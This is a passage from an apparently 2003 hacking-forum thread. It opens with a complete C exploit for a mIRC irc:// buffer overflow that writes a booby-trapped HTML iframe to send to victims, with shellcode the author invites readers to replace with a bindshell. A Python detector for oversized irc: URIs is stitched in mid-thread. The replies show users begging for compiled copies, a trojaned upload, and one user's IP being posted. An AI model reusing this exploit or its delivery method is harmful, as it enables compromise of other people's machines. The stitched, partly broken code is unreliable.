Full Version: Mirc 6.1 Remote Shell
Neo_
CODE
/** gEEk-(filtered)-khaled.c -- remote mirc < 6.11 exploit by blasty
**
** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
** nobody had written an exploit yet. So I decided to start writing one.
** Since this was my first time coding an exploit for windows, it took some
** research before I got the hang of it. (Ollydbg is much more confusing than GDB btw :P)
**
** This exploit (ab)uses the bug in irc:// URI handling. It contains a buffer
** overflow, and when more than 998 bytes are given EIP will be overwritten.
**
** At first I was thinking of a simple solution to get this exploitable. Since
** giving an URI with > 998 chars to someone on IRC is simply NOT done :)
** Then I remembered the iframe-irc:// flaw found by uuuppzz [2]
**
** This exploit will write a malicious HTML file containing an iframe executing the
** irc:// address. So you can give this to anyone on IRC for example;)
** The shellcode included only executes cmd.exe, because I don't want this to be
** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
** A 400-byte shellcode (bindshell etc.) easily fits in the buffer, but it may require
** some tweaking.
** After exiting cmd.exe mIRC will crash, so the shellcode is not 100% clean, but who carez :)
**
** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
** mIRC will start automatically when an irc:// is executed, so you can also send somebody
** an HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
**
** Anyway, have fun with it, and don't own complete newb #chans :P
**
** Greetz to:
** inz, demz, gEEkz team
**
** [1] http://www.packetstormsecurity.nl/0310-advisories/mirc61.txt
** [2] http://www.uuuppz.com/research/adv-001-mirc.htm
**
** -- blasty (blasty@geekz.nl / www.geekz.nl)
**/

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memset(), memcpy(), strlen() */


/* Stupid cmd.exe exec shellcode. hey! I r !evil;) */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77"   // 0x78bf8044 <- address of system()
"\xff\xd0";    //   call    system()


char jmpback[] =
       "\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)

char buffer[1100], fstring[1300]; // heh, need to clean this up

int main(int argc, char *argv[]) {
    FILE *evil;
    /* the shellcode contains no NUL bytes, so strlen() gives its full size */
    size_t sclen = strlen((char *)shellcode);

    fprintf(stdout, "---------------------------------------------\n"
      "mIRC < 6.11 remote exploit by blasty@geekz.nl\n"
      "---------------------------------------------\n\n");

    // NOPslides are cool (the last byte stays 0 so buffer is a valid C string)
    memset(buffer, 0x90, sizeof(buffer) - 1);

    // place shellcode in buffer
    memcpy(buffer + 20, shellcode, sclen);

    // took this one from ntdll.dll (jmp esp)
    *(long *)&buffer[994] = 0x77F4801C;

    // place jmpback shellcode in buffer
    memcpy(buffer + 20 + sclen + 1010, jmpback, strlen(jmpback));

    printf("[+] Evil buffer constructed\n");


    // open HTML file for writing
    if((evil = fopen("index.html", "a+")) != NULL) {

        // construct evil string :)
        sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

        // write string to file
        fputs(fstring, evil);

        // close file
        fclose(evil);

        printf("[+] Evil HTML file written!\n");
        return(0);
    } else {
        // uh oh.. :/
        fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
        exit(1);
    }
}
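The delivery pattern described in the post is an HTML page whose iframe points at an irc:// URI longer than the 998-byte threshold. The following checker is an added example, not code from the post or its author: it walks an HTML document with the standard-library parser and flags irc: URIs that exceed that threshold, which is how a mail gateway or proxy could spot such a page. The attribute list and the sample documents are assumptions constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Threshold from the advisory quoted in the post: more than 998 bytes in the
# irc:// URI overwrites EIP. The attribute list is an assumption of this checker.
IRC_URI_LIMIT = 998
URL_ATTRS = {"src", "href", "data", "action"}


class IrcUriFinder(HTMLParser):
    """Collect (tag, attribute, decoded length) for every irc: URI in a document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands us lower-cased tag and attribute names
        for name, value in attrs:
            if value is None or name not in URL_ATTRS:
                continue
            # decode %xx escapes so an encoded payload is measured at its real size
            uri = unquote(value.strip())
            if uri.lower().startswith("irc:"):
                self.findings.append((tag, name, len(uri)))


def scan_html(doc):
    """Return [(tag, attr, length, suspicious)] for each irc: URI found in doc."""
    parser = IrcUriFinder()
    parser.feed(doc)
    parser.close()
    return [(t, a, n, n > IRC_URI_LIMIT) for t, a, n in parser.findings]


# Constructed samples: a normal channel link and an iframe carrying an oversized URI.
BENIGN = '<p>join us: <a href="irc://irc.example.net/#chan">#chan</a></p>'
OVERSIZED = '<iframe src="irc://' + "A" * 1100 + '"></iframe>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("oversized", OVERSIZED)):
        for tag, attr, n, bad in scan_html(doc):
            verdict = "SUSPICIOUS" if bad else "ok"
            print(f"{label}: <{tag} {attr}> irc URI of {n} bytes -> {verdict}")
```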
thatsmej
Saw the exploit a few days ago....

first thing I saw:
QUOTE

TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148


the maker wrote Dutch wrong..

just something I noticed
Anddos
someone please compile this
yes100
sounds nice, compiling would be nice
xionoxid
I compiled this! Try it and tell me if it's working, thx
Anddos
no it doesn't say anything when u work it in dos
u should have tested it before u uploaded it
thanks anyway
fabien_pp
what is the command of the exploit? please
ssj4conejo
WARNING THE FILE UPLOADED BY xionoxid has the beasty virus, do not download it, my nav picked it up, fuckin script kiddies at it again. One day i swear .... i will tell ur mommies so that you can stop uppin beasty, at least try a different fuckin trojan that's not detectable.. tards.
KoNh
Don't u guys ever read:

** The shellcode included does only execute cmd.exe, because I don't want to be this
** a scriptkiddy util. But, replacing the shellcode with your own is also possible.

!!!

And lololol it is so fun, people begging fer compiles get virii..
just as it has to be doesn't it ?
vnet576
LOL...at least modify the fuckin trojan before u bind and upload it so that our AVs don't pick it up. If u're gonna infect and 0wN all of us u might as well do it right...rofl morons.
Anddos
if they keep uploading trojans then why the (filtered) aren't they banned from the forum?
dissolutions
mmmkay my a/v didn't pick it up but oh well...
xionoxid IP Address: 203.20.58.1
wicked
QUOTE (dissolutions @ Oct 28 2003, 10:03 PM)
mmmkay my a/v didn't pick it up but oh well...
xionoxid IP Address: 203.20.58.1

Crack me up xionoxid, maybe you could use some of my advice and make sure that you are anonymous before coming to forums like these lmao.

Advice for xionoxid: find the post "a Few useful things", download and install proxyrama, figure out how to use it *can't b bothered explaining* USE IT!

ps: click on my little link below

pps: maybe you already are anonymous

another tip: there's too many experienced people and dangerous minds in this forum so I wouldn't be f$%^&g with the wrong one.

........enough said......

neb
xionoxid you are A BASTARD!!!!
Cheat, I just dl'd this F***** Trojan and now I have difficulties removing it!!!
If someone has information on how to remove this cheat, I am listening
vnet576
I removed this (filtered)'s trojan with trojanhunter:

http://www.trojanhunter.com/
neb
I am going to try this now. Thanks a lot
jetprice
QUOTE (Anddos @ Oct 28 2003, 03:42 PM)
someone please compile this smile.gif

If you can't even say the magic word "please" I won't compile anything for you... do it yourself goddammit. It's always the same with these kiddies in here, if you don't know how to compile then why in the name of Zeus's BUTH*L* do you hack? You are worthless; after all, without us you can do anything but hacking!

Maybe I sound a bit harsh but what I say is meant, this is a security board and not a board with free leech for exploits, you should be ashamed of yourself!

Also a remote 4byte shellcode does NOT exist! You see something like that: ask yourself some questions...

greets jetprice
chris105
I tried to compile but it didn't work